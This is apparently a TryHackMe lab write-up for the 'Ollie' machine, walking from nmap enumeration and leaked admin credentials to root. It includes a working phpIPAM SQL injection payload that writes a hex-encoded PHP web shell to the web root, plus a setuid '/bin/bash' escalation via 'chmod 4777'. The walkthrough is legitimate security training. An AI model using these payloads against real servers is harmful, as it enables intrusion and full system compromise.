Skip to main content
  1. Writeups/
  2. TryHackMe/

Ollie

·490 words·3 mins
TryHackMe Linux Medium
K21
Author
K21
I am human.
Tryhackme Streamline Icon: https://streamlinehq.comTryHackMe
Table of Contents

Enumeration
#

Lets start with the simple nmap scan and rustscan.

Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 11:10 +0545
Nmap scan report for 10.10.17.91 (10.10.17.91)
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b7:1b:a8:f8:8c:8a:4a:53:55:c0:2e:89:01:f2:56:69 (RSA)
|   256 4e:27:43:b6:f4:54:f9:18:d0:38:da:cd:76:9b:85:48 (ECDSA)
|_  256 14:82:ca:bb:04:e5:01:83:9c:d6:54:e9:d1:fa:c4:82 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/ /immaolllieeboyyy
| http-title: Ollie :: login
|_Requested resource was http://10.10.17.91/index.php?page=login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.16 seconds

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
1337/tcp open  waste   syn-ack

Lets enumerate the port 80. Hmm we spawned on a login page.

Lets enumerate further.

We might get local file inclusion vulnerability here. Lets check. Hmm not working.

Doing directory busting gave us many things.

Found many thing but nothing seems interesting.

Hmm lets also see that port 1337.

Interesting. Lets move forward. And we got the creds.

Lets try to login on login page.

Username: admin
Password: OllieUnixMontgomery!

Exploit
#

Hmmm. After searching for possible exploits of [phpIPAM IP address management [v1.4.5],we can find this.

Hmm it was using a sql injection to upload php shell. Lets try sql injection to test if it is possible.

We can find this in a edit BGP subnet mapping thing. And we found exact number of columns.

Hmmm lets try to use that exploit we found on exploitdb. Or we can do this.


" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/evil.php' -- -

So what happening here is we are using UNION attack and uploaded hexed php web shell by doing INTO OUTFILE into /var/www/html/yourfile.php cause /var/www/html/ is the root directory of web page.

And we can now use this to execute commands.

Now we can get reverse shell by revshell.com

And we can also get full tty shell from here. full tty shell

Privelege Escalation
#

We can get a some creds here.

But this was not working for user ollie. After trying and enumerating different thing,there is the password reuse and we can use same password that we got before for user ollie.

Now lets try to became root. I tried different exploits and tried to find different thing but nothing worked. Linpeas is also not working.linpeas Lets also try pspy.pspy After seeing and trying different things,we can see this.

Lets see what is it. Its nothing. But we can use it to execute command as root.

ollie@hackerdog:/tmp$ cat /usr/bin/feedme
#!/bin/bash

chmod 4777 /bin/bash
# This is weird?
ollie@hackerdog:/tmp$

Here we are changing the permission of /bin/bash ,giving it with setuid.

And Now we are root.

Done
#

And done.

Learned lots of things again. I hope you are okay,take care :).